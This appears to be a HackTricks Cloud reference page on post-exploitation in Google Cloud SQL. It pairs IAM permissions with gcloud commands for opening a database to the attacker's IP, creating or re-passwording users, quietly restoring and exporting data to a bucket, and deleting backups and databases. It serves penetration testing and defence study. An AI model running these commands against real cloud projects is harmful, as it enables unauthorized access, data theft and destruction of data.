# GCP - Cloud SQL Post Exploitation {% hint style="success" %} Learn & practice AWS Hacking:

[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)

\ Learn & practice GCP Hacking:

[**HackTricks Training GCP Red Team Expert (GRTE)**

](https://training.hacktricks.xyz/courses/grte)

Support HackTricks

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

{% endhint %} ## Cloud SQL For more information about Cloud SQL check: {% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %} [gcp-cloud-sql-enum.md](../gcp-services/gcp-cloud-sql-enum.md) {% endcontent-ref %} ### `cloudsql.instances.update`, ( `cloudsql.instances.get`) To connect to the databases you **just need access to the database port** and know the **username** and **password**, there isn't any IAM requirements. So, an easy way to get access, supposing that the database has a public IP address, is to update the allowed networks and **allow your own IP address to access it**. ```bash # Use --assign-ip to make the database get a public IPv4 gcloud sql instances patch $INSTANCE_NAME \ --authorized-networks "$(curl ifconfig.me)" \ --assign-ip \ --quiet mysql -h # If mysql # With cloudsql.instances.get you can use gcloud directly gcloud sql connect mysql --user=root --quiet ``` It's also possible to use **`--no-backup`** to **disrupt the backups** of the database. As these are the requirements I'm not completely sure what are the permissions **`cloudsql.instances.connect`** and **`cloudsql.instances.login`** for. If you know it send a PR! ### `cloudsql.users.list` Get a **list of all the users** of the database: ```bash gcloud sql users list --instance ``` ### `cloudsql.users.create` This permission allows to **create a new user inside** the database: ```bash gcloud sql users create --instance --password ``` ### `cloudsql.users.update` This permission allows to **update user inside** the database. For example, you could change its password: {% code overflow="wrap" %} ```bash gcloud sql users set-password --instance --password ``` {% endcode %} ### `cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get` Backups might contain **old sensitive information**, so it's interesting to check them.\ **Restore a backup** inside a database: ```bash gcloud sql backups restore --restore-instance ``` To do it in a more stealth way it's recommended to create a new SQL instance and recover the data there instead of in the currently running databases. ### `cloudsql.backupRuns.delete` This permission allow to delete backups: ```bash gcloud sql backups delete --instance ``` ### `cloudsql.instances.export`, `storage.objects.create` **Export a database** to a Cloud Storage Bucket so you can access it from there: ```bash # Export sql format, it could also be csv and bak gcloud sql export sql --database ``` ### `cloudsql.instances.import`, `storage.objects.get` **Import a database** (overwrite) from a Cloud Storage Bucket: ```bash # Import format SQL, you could also import formats bak and csv gcloud sql import sql ``` ### `cloudsql.databases.delete` Delete a database from the db instance: ```bash gcloud sql databases delete --instance ``` {% hint style="success" %} Learn & practice AWS Hacking:

[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)

\ Learn & practice GCP Hacking:

[**HackTricks Training GCP Red Team Expert (GRTE)**

](https://training.hacktricks.xyz/courses/grte)

Support HackTricks

{% endhint %}